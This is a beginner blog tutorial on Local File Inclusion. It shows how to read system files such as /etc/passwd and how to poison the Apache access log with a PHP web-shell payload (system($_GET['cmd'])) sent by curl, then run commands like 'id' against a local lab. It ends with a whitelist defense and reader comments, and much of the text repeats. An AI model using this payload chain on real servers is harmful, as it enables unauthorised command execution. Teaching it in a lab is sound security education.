LFI short for "Local File Inclusion".
Hello all, this is my second blog on the Topic of LFI (Local File Inclusion). (First one was on CSRF. You can find it here:-)
What is it?
How to Exploit it?
How it can be dangerous?
How to prevent it?
So, let's get started.,
What is LFI?
LFI is the vulnerability in which attacker includes the local file from the system. Sound's simple.
Okay let's see the example to get more....
Suppose your are in http://januapp/demo/files.php?getfile=delete.txt, And the contents of the file is "I am for deleting"
Now, for testing the LFI existence you need to change the file name like delete.txt to delet.txt and see the behaviour of the web. Is any error occur like failed to load the inclusion something like
Note:- It is not always you see this error. Sometimes developer hide their errors.
Now, How do I exploit it?
For exploit we need to change the filename to which is in the server. Like etc/passwd file in the linux system, for windows C:\WINDOWS\System32\drivers\etc\hosts. So this can be ensure that the attaker can read the system files.
Like this:-
So, this ensures me that I am able to read the files from the server so, you have found vulnerability.
Note:- Sometimes you need to go up the directories through Directory Transversal attack. Google it.
So, you can read the passwd file only? Is it possible to make LFI more dangerous?
Yes, it is, We can upload the shell though LFI if only we can read the access log file. (If you can not read the file then the attack will not gonna work.).
But why log file? Because the log file stores all the URL's.
Now, In the Apache server there is a log file in this path-
Have you seen the alert box with the execution of the javascript. It means that I have a url in this file which have some javascript code in it, So when I open this log file It executes the alert box.
So similarly we will issue a URL which have some php code.
So, here I provide an array which involves all alloweded files i.e. delete.txt, undelete.txt . Then I check if the file is allowed or not through
Let's look at a short video which will show the result of the code.
That's all for LFI, hope you really enjoyed it while reading. On Twitter @agrawalsmart7
Thank you very much. Like and comment if you want. And stay tuned for my next blog ;).
What is it?
How to Exploit it?
How it can be dangerous?
How to prevent it?
So, let's get started.,
What is LFI?
LFI is the vulnerability in which attacker includes the local file from the system. Sound's simple.
Okay let's see the example to get more....
Suppose your are in http://januapp/demo/files.php?getfile=delete.txt, And the contents of the file is "I am for deleting"
Now, for testing the LFI existence you need to change the file name like delete.txt to delet.txt and see the behaviour of the web. Is any error occur like failed to load the inclusion something like
Note:- It is not always you see this error. Sometimes developer hide their errors.
Now, How do I exploit it?
For exploit we need to change the filename to which is in the server. Like etc/passwd file in the linux system, for windows C:\WINDOWS\System32\drivers\etc\hosts. So this can be ensure that the attaker can read the system files.
Like this:-
So, this ensures me that I am able to read the files from the server so, you have found vulnerability.
Note:- Sometimes you need to go up the directories through Directory Transversal attack. Google it.
So, you can read the passwd file only? Is it possible to make LFI more dangerous?
Yes, it is, We can upload the shell though LFI if only we can read the access log file. (If you can not read the file then the attack will not gonna work.).
But why log file? Because the log file stores all the URL's.
Now, In the Apache server there is a log file in this path-
/var/log/apache2/access.log
But remember there are different filename and file path for different servers. Like in windows,
C:\xampp\apache\logs\access.log
So when I include this file what i got see this image below.
Have you seen the alert box with the execution of the javascript. It means that I have a url in this file which have some javascript code in it, So when I open this log file It executes the alert box.
So similarly we will issue a URL which have some php code.
Something like this:- http://vulnerabledomain.com/<?php system($_GET['cmd'])?> Note:- We will use curL, as browser will encode the url which breaks the attack.So let's understand it.1. You need to download the cuRL2. Then use cuRL to send the malicious URL which will store in the access.log file. 3. You can view the file by adding that parameter which is provided in the URl. i.e. "cmd"Let's see the screenshots ;) 
In the first screen shot you can see the PHP payload with passthru() and with the test123 parameterAnd now we need to add the test123 parameter to the URL. ;) http://127.0.0.1/index.php?page=C:\xampp\apache\logs\access.log&test123= Now let's confirm that we have successfully uploaded our shell.
Our 1st Exploit:-
http://127.0.0.1/index.php?page=C:\xampp\apache\logs\access.log&test123=id
Result:
Any doubt. Okay let's see the next one.Second Exploit:-http://127.0.0.1/mutillidae/index.php?page=C:\xampp\apache\logs\access.log&test123=dir Result:-
Okay, So, far we have only read about how LFI is dangerous? Now,
What is the way to protect it?
The best and very simple protection is making an Array which includes alloweded files.
For example:-
Here is the code I written for it.<?php
$v1 = array('delete.txt', 'undelete.txt');
$filename = @$_GET['getfile'];
if(isset($filename))
{
if (in_array($filename, $v1))
{
include($filename);
}
else
{
include("index.php");
}
}
?> So, here I provide an array which involves all alloweded files i.e. delete.txt, undelete.txt . Then I check if the file is allowed or not through
in_array()If the file is not allowed then it will include the index.php file hence, protected from the LFI attack. Make Sense?.
Let's look at a short video which will show the result of the code.
Thank you very much. Like and comment if you want. And stay tuned for my next blog ;).
Thanks for explaining so well... :)
ReplyDeleteThanks mate, appreciable.
DeleteGood writeup!!
ReplyDeleteThanks mate ;)
Delete